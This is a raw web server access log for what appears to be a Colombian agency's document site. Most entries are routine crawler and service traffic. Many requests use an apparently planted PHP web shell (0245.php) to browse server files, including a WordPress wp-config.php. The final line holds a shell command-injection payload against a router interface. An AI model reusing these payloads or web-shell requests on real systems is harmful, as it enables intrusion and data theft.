47.128.59.70 - - [15/Jul/2024:05:40:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Cbin&f=tool-wrapper.sh&ft=info HTTP/1.1" 200 3717
47.128.40.101 - - [15/Jul/2024:05:40:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001168.tif HTTP/1.1" 200 2945
47.128.121.86 - - [15/Jul/2024:05:40:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CParticipaci%F3n&f=126PM01-PR07.pdf&ft=info HTTP/1.1" 200 3681
201.245.192.253 - - [15/Jul/2024:05:41:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.15 - - [15/Jul/2024:05:41:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+401-450&f=00000412.tif&ft=info HTTP/1.1" 200 3731
201.245.192.253 - - [15/Jul/2024:05:41:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
66.249.66.20 - - [15/Jul/2024:05:41:43 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/3065.pdf HTTP/1.1" 200 1273628
201.245.192.253 - - [15/Jul/2024:05:42:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:05:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29025
216.245.221.92 - - [15/Jul/2024:05:42:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:05:43:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:05:41:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
172.22.2.4 - - [15/Jul/2024:05:43:20 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [15/Jul/2024:05:41:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [15/Jul/2024:05:43:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/RESOLUCION%2031%20DE%201995.pdf HTTP/1.1" 200 68070
201.245.192.253 - - [15/Jul/2024:05:44:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.62 - - [15/Jul/2024:05:44:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2017-11-16.log&ft=edit&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&c=1 HTTP/1.1" 200 3125
47.128.22.214 - - [15/Jul/2024:05:44:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail%5C&f=OpenSSL+License.txt&ft=img HTTP/1.1" 200 14374
172.22.2.4 - - [15/Jul/2024:05:42:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
201.245.192.253 - - [15/Jul/2024:05:45:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
91.238.181.24 - - [15/Jul/2024:05:45:08 -0500] "\x03" 400 226
201.245.192.253 - - [15/Jul/2024:05:46:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:05:46:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [15/Jul/2024:05:47:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [15/Jul/2024:05:47:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:05:48:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [15/Jul/2024:05:48:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/RESOLUCION%2026%20DE%201995.pdf HTTP/1.1" 200 34781
201.245.192.253 - - [15/Jul/2024:05:49:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.230.152.209 - - [15/Jul/2024:05:49:12 -0500] "GET /robots.txt HTTP/1.1" 404 1034
172.22.2.4 - - [15/Jul/2024:05:47:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:05:50:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.32 - - [15/Jul/2024:05:50:13 -0500] "GET /mis-de-50-aves-silvestres-fueron-recuperadas-en-la-localidad-de-tunjuelito.html HTTP/1.1" 200 806
172.22.2.4 - - [15/Jul/2024:05:48:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
186.154.34.111 - - [15/Jul/2024:05:50:38 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 14105
186.154.34.111 - - [15/Jul/2024:05:50:39 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
186.154.34.111 - - [15/Jul/2024:05:50:39 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
172.22.2.4 - - [15/Jul/2024:05:50:43 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [15/Jul/2024:05:50:43 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [15/Jul/2024:05:50:43 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [15/Jul/2024:05:50:43 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [15/Jul/2024:05:50:44 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [15/Jul/2024:05:50:44 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [15/Jul/2024:05:50:44 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/Jul/2024:05:50:44 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/Jul/2024:05:50:44 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jul/2024:05:50:44 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
201.245.192.253 - - [15/Jul/2024:05:51:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:05:51:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [15/Jul/2024:05:52:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [15/Jul/2024:05:52:52 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [15/Jul/2024:05:52:54 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [15/Jul/2024:05:53:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [15/Jul/2024:05:53:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/RESOLUCION%20141%20DE%201995.pdf HTTP/1.1" 200 176959
201.245.192.253 - - [15/Jul/2024:05:54:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:05:55:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:05:53:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:05:56:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:05:54:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
201.245.192.253 - - [15/Jul/2024:05:56:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [15/Jul/2024:05:57:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.96.17 - - [15/Jul/2024:05:57:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2017-10-29.log HTTP/1.1" 200 2749
47.128.97.45 - - [15/Jul/2024:05:57:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2020-12-27.log HTTP/1.1" 200 2747
47.128.20.44 - - [15/Jul/2024:05:57:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2021-07-26.log HTTP/1.1" 200 2747
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2002%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 200 3521427
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 200 228190
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2024%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 575948
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000001%20DEL%2015%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 200 290944
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000013%20DEL%2012%20DE%20DICIEMBRE%20DEL%202023.pdf HTTP/1.1" 200 1237263
172.22.2.4 - - [15/Jul/2024:05:57:36 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [15/Jul/2024:05:57:37 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000001%20DEL%2020%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 200 317520
172.22.2.4 - - [15/Jul/2024:05:57:37 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
172.22.2.4 - - [15/Jul/2024:05:57:37 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
172.22.2.4 - - [15/Jul/2024:05:57:37 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [15/Jul/2024:05:57:38 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000013%20DEL%2012%20DE%20DICIEMBRE%20DEL%202023.pdf HTTP/1.1" 200 1237263
172.22.2.4 - - [15/Jul/2024:05:57:38 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
47.128.121.62 - - [15/Jul/2024:05:57:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2018-07-06.log HTTP/1.1" 200 2749
172.22.2.4 - - [15/Jul/2024:05:57:40 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
66.249.66.21 - - [15/Jul/2024:05:57:40 -0500] "GET /Publicaciones/2024EE64667.pdf HTTP/1.1" 404 227
52.167.144.137 - - [15/Jul/2024:05:57:46 -0500] "GET /Publicaciones/2024EE10315.pdf HTTP/1.1" 404 227
47.128.115.63 - - [15/Jul/2024:05:57:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2022-01-02.log HTTP/1.1" 200 2748
216.245.221.92 - - [15/Jul/2024:05:57:52 -0500] "HEAD / HTTP/1.1" 200 -
47.128.98.61 - - [15/Jul/2024:05:57:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2022-01-29.log HTTP/1.1" 200 2747
201.245.192.253 - - [15/Jul/2024:05:58:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.62.219 - - [15/Jul/2024:05:58:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2017-11-27.log HTTP/1.1" 200 2749
47.128.99.131 - - [15/Jul/2024:05:58:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150904-1235-297000.txt&ft=info&white=1 HTTP/1.1" 200 3761
52.167.144.137 - - [15/Jul/2024:05:58:37 -0500] "GET /Publicaciones/2024EE129186.pdf HTTP/1.1" 404 228
66.249.66.19 - - [15/Jul/2024:05:58:40 -0500] "GET /BLA/resoluciones/AUTOS%202008/3282.pdf HTTP/1.1" 200 84834
66.249.66.20 - - [15/Jul/2024:05:58:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/0286.pdf HTTP/1.1" 200 37334
201.245.192.253 - - [15/Jul/2024:05:59:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [15/Jul/2024:05:59:09 -0500] "GET /Publicaciones/2024EE130544.pdf HTTP/1.1" 404 228
40.77.167.78 - - [15/Jul/2024:05:59:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0603.pdf HTTP/1.1" 200 394980
47.128.113.185 - - [15/Jul/2024:05:59:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes&f=class-wp-upgrader-skins.php&ft=info HTTP/1.1" 200 3728
47.128.124.201 - - [15/Jul/2024:05:59:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=post-template.php&ft=info&fullhexdump=1 HTTP/1.1" 200 63288
47.128.126.234 - - [15/Jul/2024:05:59:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima&f=1.htaccess1&ft=info HTTP/1.1" 200 3710
47.128.124.20 - - [15/Jul/2024:05:59:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cfiles%5Csearch&f=search61.xml&ft=info HTTP/1.1" 200 3719
201.245.192.253 - - [15/Jul/2024:06:00:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.228 - - [15/Jul/2024:06:00:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cfiles&f=guia_impresion-lit.pdf&ft=info HTTP/1.1" 200 3661
47.128.110.14 - - [15/Jul/2024:06:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2022-10-12.log HTTP/1.1" 200 2747
40.77.167.49 - - [15/Jul/2024:06:00:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+1-50%2F HTTP/1.1" 200 11867
47.128.124.131 - - [15/Jul/2024:06:00:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes&f=class-wp-filesystem-direct.php&ft=info HTTP/1.1" 200 3707
201.245.192.253 - - [15/Jul/2024:06:01:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:05:59:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:06:01:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
172.22.2.4 - - [15/Jul/2024:06:00:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [15/Jul/2024:06:02:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [15/Jul/2024:06:02:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:06:03:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [15/Jul/2024:06:03:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/RESOLUCION%20108%20DE%201995.pdf HTTP/1.1" 200 128692
201.245.192.253 - - [15/Jul/2024:06:04:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:06:05:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:06:04:06 -0500] "OPTIONS /BLA/boletinlegal/ HTTP/1.1" 200 45003
201.245.192.253 - - [15/Jul/2024:06:06:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:06:06:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
172.22.2.4 - - [15/Jul/2024:06:06:21 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5122&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 1073
186.102.59.5 - - [15/Jul/2024:06:06:36 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18v5uJZjRAexXdKPyLATum2q2DOFNsEJz87pVHsXy9W9/rLSgyNV9Y3&y=U2FsdGVkX1/kQjhg7L4AzwLfAl0EdTDpUPG1oGx2eyHDo2HFFIlJr7bmh5ui/z0X HTTP/1.1" 200 30
186.102.59.5 - - [15/Jul/2024:06:06:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+ObTgXFabYWaPu4lYT841SqPa++G2p2d/exPvZb4MOkljoCmAdGiLLBYzGz8E/H2Eks3XQDmKyxaGzFea60xvZsqTaFw1vWG8=&u=U2FsdGVkX18L6UFiLXgwM67rTPasiDWAYznFSgG4Z1M=&y=U2FsdGVkX1/kQjhg7L4AzwLfAl0EdTDpUPG1oGx2eyHDo2HFFIlJr7bmh5ui/z0X HTTP/1.1" 200 97
186.102.59.5 - - [15/Jul/2024:06:06:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/PEFpeXo28jwYCG0UleErzI5bA8hxXALLS9KXrRSL2eXfUp7+l7a971S6ts4hwn2W+7BP1Y483DXWygWAn32cE0omtSbsShH7VN09Q/AsiGtfZqqXQL/MoL8uTfgpw5kspaw0oDITRmzeExldpFbuE/8G34w3hEXTcOnKrrFrfAAyiKZuVXG6LF7wbqyJ2wJC/v+49w2vKBLMR3LF0FNxPq/M+F5nuH//IlsPCgD9zEgNiSQqmWt+duPZnm9fkMCXmZr9DzBH8vdwWlhwmtxt5NfHt6EKi7F6+FZ8aC3CqcEzvjlKUPSnETLC/m/FP2Bl1q0xGT0Ey677SbibxpfmlBdiLkkSqZO7Vlxp+fKCtkBWUL3efXxDc0spZyCl2NDiRvVqpMkOMjF79i/4srQzi6C+IMCr1FCGx1yOOABHjlNs4wpgCGIuYBxS92zozXjbUJMvkRVtPx1esUS6ewlnr1X7kJw+B6VHGVDOYGkUONjH0Knxgesme4VVHBu3WABPcqUG+A1c2ydYILhDIqSz0uv34xEpMkhANDzVW0b54/fmtngZ4z+ryLxNgxToOWikXe8exPamMjs5lzHBxCbNhpagVAz3d+ZA9ZV8QktX/FZNoomk14Hyp3dW1u7IOQCg1kueSiSnQ7hMVxM5vv+kDB+jgB3nXqnC5qY3DhPfffLP/OZWIc0GIFNEuOLo0BrDV8xKqC+BCg/sJeC3+Hx7MUW1pywnYsPvLafXoHsIS5X4FEOVV3jJ75uIhsiPjH7U8q+hoL5Dgu+nb62lZG80gpa1KLOiG/9IxFLB6PU8yU2g3its/99u7IfRCdtrSfXX1KcSJhzoaIbph/nleph/udYxZ8Qdu6dxft/0LUgpAWB0NhsZAfAXuFq2o4sx2PaIvqLQfnBxyOsdgYORP+4EbyERUUWXVH+maN2zjSyvEdy6RFHB2ThFF37i4lyOooaBG/p8RPnlDtMVFQBXmRX3JILZd63FlMbDAgf8+kaUtYmVHXDfLkfNDlNGQ+calBhNe7bXxDT66Pqlb9zQcsn8rW2T2tYiExHZfMoPcqIMXHURRHI25D0hUwQ7+zL2wirYgOejQAFK4kFoIxZ8qmugbACSoU+wUbjyhS5VMymvLMX04Zp/MsxS5jMY4imsJHdMXyP16ueeOk8OoCpUXgNEIWPFXAE4Eae6wnhkigCHxvr1yuFinBnjZgGTS/m+UdWGdiSZsX8IK5bhfHgk0ZmqIGxMMi7NiOh+5cdUCTtXIiqgeFP1l3dtRNg09PaIoD5h6GLRvwdRggWLYEHB8gptCsR/okKqGvTqADpRfRA9A65IqTP+2seM5USwYCJNyjST9GABve9y2NaF1tfOvEILd5xJA8S/rb+ibw5HdlPWylLVq4THh5kYLptDqI11goqo0GgRgwm7u14PNu8781tOppozdCfLWFrEKeA2KwGq+5g5fhY5OwDFUIkD35ptZZhn/5k72pt/Vdfg0OyRAr+GRMKCd2Iowte3XdLa3clodYpGgtmPhLPaKSlXkggkP573nwRxJTmiT0Xbgel68g5nyLjFAw34QsJGjTmPdxqFOP6L2OCw/BCCSw3g1ZAWFZdGTYdcIWF4rAo2T6AZNZG3lpCR1O5RIvZpRrNapl3vcwFVJXBkndXhqDQ6MoMhopwHE5b1TVjcQT+mcHBYU2aBZKFMgqBu8lRxdLiP8L1758JEBeF3PArItTZSQxkf1dy4D//TnKftSU1Hu2hAil1bukVTBkUv2Uig=&u=U2FsdGVkX18L6UFiLXgwM67rTPasiDWAYznFSgG4Z1M=&y=U2FsdGVkX1/kQjhg7L4AzwLfAl0EdTDpUPG1oGx2eyHDo2HFFIlJr7bmh5ui/z0X HTTP/1.1" 200 4585
186.102.59.5 - - [15/Jul/2024:06:06:37 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18B96M8THzqcuMemIVzqPFe9c5udCb+3SHY2WDjEJIdVA9+JAGtRu4fD/Ybslsb+oB93LRd6qIYOiNg91keYmO0WN+L0e+lNJfP5cQ+mv4j0nDvcy1TY7uJ2Pt2F3kDqBx8Jx97pk/zy75SPAVhMJQLM9Lh61mBT92zMRpILDsoKnRrYLVyKS9ewpSFnR+Ok6XQ8pG1qmQzujqqsXF5mvRVi/blIyARYGeDUTeKBGEZ8BUOzUoXCrHgCLukuc50RolQjXLvuMrop2Xy0toDj4P1yseMmzIKCVr452M5ky4f1IUxhO/Q8QpufgIBZItwh6fd2kAF2gsWrvA1QQCPS/zbrJMf29OgJ9QzvdWFNWBDmIow7Up6+9DgWcFiTYkm1LTmXWxkF4FwNYEtaoq//wM1XUk0HjDYwWh96kaa70XX12//oCw6M/tMKpLKliOzwd4jZa54XdDzJ0ItF2zSPaaqy5IFUV/HYVRy79jTz9tmo5Bha6FVNxcRngHS3N1VGkcEtG0uFRutO6gdZr/alVmEIFD8Z/SjPO0+N4mK4XLHFBLGaOU4vveHAXGeNRuIDHTaevOuvApPMYfEe9Uve6flkto5M8xdK7cP5oATLJpPJU+nQGzqPg+ke81G0MGxQve4gVjHxcgqrEsyOquSLRGBRDP5KAFFlsguwrEaawsj+K73XaN861Xsw9UOxMV0zKFgGivoGtVM8mMIV3MpLUnrKYyipIBwMCON9Dt0NmXNb9kX5yoxyGYD&u=U2FsdGVkX18L6UFiLXgwM67rTPasiDWAYznFSgG4Z1M=&y=U2FsdGVkX1/kQjhg7L4AzwLfAl0EdTDpUPG1oGx2eyHDo2HFFIlJr7bmh5ui/z0X HTTP/1.1" 200 208
186.102.59.5 - - [15/Jul/2024:06:06:37 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18v5uJZjRAexXdKPyLATum2q2DOFNsEJz87pVHsXy9W9/rLSgyNV9Y3 HTTP/1.1" 200 30244
186.154.34.111 - - [15/Jul/2024:06:06:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 892005
172.22.2.4 - - [15/Jul/2024:06:05:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:06:07:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.24.255 - - [15/Jul/2024:06:07:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3886.pdf HTTP/1.1" 200 2740
47.128.122.185 - - [15/Jul/2024:06:07:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page20_thumbnail.jpg&ft=info HTTP/1.1" 200 3892
47.128.122.220 - - [15/Jul/2024:06:07:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00001563.tif&fullhexdump=1 HTTP/1.1" 200 2741
47.128.122.205 - - [15/Jul/2024:06:07:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE%5C&f=helpdesk.pm5&ft=img HTTP/1.1" 200 14970
47.128.98.49 - - [15/Jul/2024:06:07:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=A52003.doc HTTP/1.1" 200 2741
172.22.2.4 - - [15/Jul/2024:06:06:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
47.128.37.35 - - [15/Jul/2024:06:07:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=fzs-2019-06-15.log&ft=edit&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&c=1 HTTP/1.1" 200 3125
216.245.221.92 - - [15/Jul/2024:06:07:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:06:08:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.180 - - [15/Jul/2024:06:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00001049.tif&fullhexdump=1 HTTP/1.1" 200 2742
47.128.99.133 - - [15/Jul/2024:06:08:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=wp-config.php&ft=img&imgsize=20 HTTP/1.1" 200 15061
47.128.36.190 - - [15/Jul/2024:06:08:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=gn.png HTTP/1.1" 200 2738
47.128.37.27 - - [15/Jul/2024:06:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=sistemasbuz2.php HTTP/1.1" 200 2744
66.249.66.21 - - [15/Jul/2024:06:08:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/RESOLUCION%2033%20DE%201995.pdf HTTP/1.1" 200 109816
45.148.10.202 - - [15/Jul/2024:06:08:49 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
